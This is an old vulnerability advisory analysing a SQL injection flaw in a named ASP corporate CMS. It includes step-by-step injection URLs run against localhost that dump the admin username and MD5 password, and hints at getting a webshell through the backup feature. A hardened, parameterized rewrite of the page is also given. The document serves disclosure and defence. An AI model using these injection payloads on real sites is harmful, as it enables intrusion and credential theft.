Crown Dragon Tech multi-style corporate website management system vulnerability analysis - Vulnerability Warning - Black Bar Safety Net (myhack58)

2007-10-14T00:00:00
ID MYHACK58:62200717250
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-10-14T00:00:00

Description

This article was written by www.reghacker.cn; please credit the source when reproducing it. Thank you.

I haven't published any articles lately, and fewer people have been visiting. There is no way around it: work has kept me too busy recently, which is depressing. Today I went looking for a blog system and noticed this system's ASP source code listed in red in the "source code" section, apparently a paid download, so I downloaded it to have a look. I did not originally intend to analyse it, but then I remembered the "Good Finishing" site management system, whose vulnerabilities I analysed in an article a few days ago; if you don't remember it, go and have a look. Enough chatter. I only got the trial version, so some back-end functions are unavailable, but that does not affect the analysis of the system. The vulnerability I wrote about earlier in the Deep Throat site-building system, published in Hacker Line of Defense, is very similar to this one; of course I don't know whether they copied each other, but the chance of independently making the same mistake is not that large. Anyway, look at the code section of the CompHonorBig.asp file.

Program code:

```asp
<%
' id is read from the query string without any validation
Dim id
id = Request.QueryString("id")
%>
<%
' the raw value is concatenated straight into the SQL text: this is the injection point
Set rs = Server.CreateObject("ADODB.Recordset")
rs.Open "select * from CompHonor where id=" & id, conn, 1, 1
%>
```

Obviously, the value of the client-submitted variable id goes straight into the database query without any filtering. This is a textbook SQL injection vulnerability, so there is not much more to say about it; let's walk through the manual process. Submitting http://127.0.0.1/CompHonorBig.asp?id=18%20and%201=1 in the address bar returns the normal page, as shown in Figure 1.

Figure 1

Next, submitting http://127.0.0.1/CompHonorBig.asp?id=18%20and%201=2 returns a blank page, so there is something to work with, as shown in Figure 2.

Figure 2

Now we guess the table name. Submitting http://127.0.0.1/CompHonorBig.asp?id=18%20and%20exists(select%20*%20from%20admin) returns the normal page, indicating that the admin table exists. With the table name in hand we guess the columns: http://127.0.0.1/CompHonorBig.asp?id=18%20and%20exists(select%20username%20from%20admin) returns the normal page, showing that the admin table has a username column. We continue by guessing the name of the column that stores the password: http://127.0.0.1/CompHonorBig.asp?id=18%20and%20exists(select%20password%20from%20admin) returns the normal page, showing that the admin table has a password column. From the code above we know the program does not use an ORDER BY clause, so we can use one to find the number of fields. http://127.0.0.1/CompHonorBig.asp?id=18%20order%20by%205 returns normally, while http://127.0.0.1/CompHonorBig.asp?id=18%20order%20by%206 returns a blank page, so there are 5 fields. Continuing, http://127.0.0.1/CompHonorBig.asp?id=18%20union%20select%201,2,3,4,5%20from%20admin returns the page in Figure 3, whose source code is as follows:

Program code:

```html
<div align='center'><img src=4 border=0 ></div>
```

Figure 3

Note that the src attribute of the <img> tag is 4, which is the 4 from the statement we constructed. Figure 3 also shows the number 2, so we use a UNION query to obtain the username and password. Submitting http://127.0.0.1/CompHonorBig.asp?id=18%20union%20select%201,username,3,password,5%20from%20admin returns a page with the username and password in its source code, as shown in Figure 4.

Figure 4

The password is stored as an MD5 hash; if it is relatively weak, the original can be recovered through an online cracking site.
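For comparison, here is a hardened version of the CompHonorBig.asp query, added as an example and not part of the vendor's code: it allow-lists id as digits and binds it as a typed parameter, which removes the string concatenation the injection relies on. It assumes conn is the open ADODB connection the original page uses, and the column name honorpic is assumed (the original selects *).

```asp
<%
' Added example, not the vendor's code: CompHonorBig.asp rewritten so that the id
' value is validated and then bound as a query parameter instead of being pasted
' into the SQL text. "conn" is assumed to be the open ADODB.Connection the original
' page uses; the column name honorpic is assumed (the original uses SELECT *).
Const adCmdText = 1      ' ADO constants spelled out in case adovbs.inc is not included
Const adInteger = 3
Const adParamInput = 1

Dim rawId, id, re, cmd, rs
rawId = Trim(Request.QueryString("id"))

' 1. Allow-list the input: a record id is a short string of digits and nothing else.
'    "18 and 1=1", "18 union select ..." and "18 order by 5" all fail this test.
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid id"
    Response.End
End If
id = CLng(rawId)

' 2. Parameterized query: the value travels as a typed integer parameter, so the
'    database never parses it as SQL even if step 1 were ever relaxed.
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
cmd.CommandText = "SELECT honorpic FROM CompHonor WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , id)
Set rs = cmd.Execute

' 3. Output encoding: the stored path is HTML-encoded on the way out, so a value
'    planted in the table cannot break out of the src attribute.
If rs.EOF Then
    Response.Write "No such record"
Else
    Response.Write "<div align='center'><img src='" & Server.HTMLEncode(rs("honorpic")) & "' border=0></div>"
End If
rs.Close
Set rs = Nothing
Set cmd = Nothing
%>
```

With the parameter bound this way, the probes shown in Figures 1 to 4 all receive a 400 response before any query runs, and the UNION trick no longer has a query to attach to.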

Well, being rather lazy, I won't continue the analysis. There may be other vulnerabilities: the back end has a database backup feature, so getting a webshell should be easy, but I won't go through that either. The remaining holes are left for everyone else to analyse.

Supplementary note: this vulnerability appears to be exactly the same as the one in the Good Finishing enterprise site-building system, and the Deep Throat site-building system also looks like a copy of it. I don't know what is going on there. Copying? Unknown...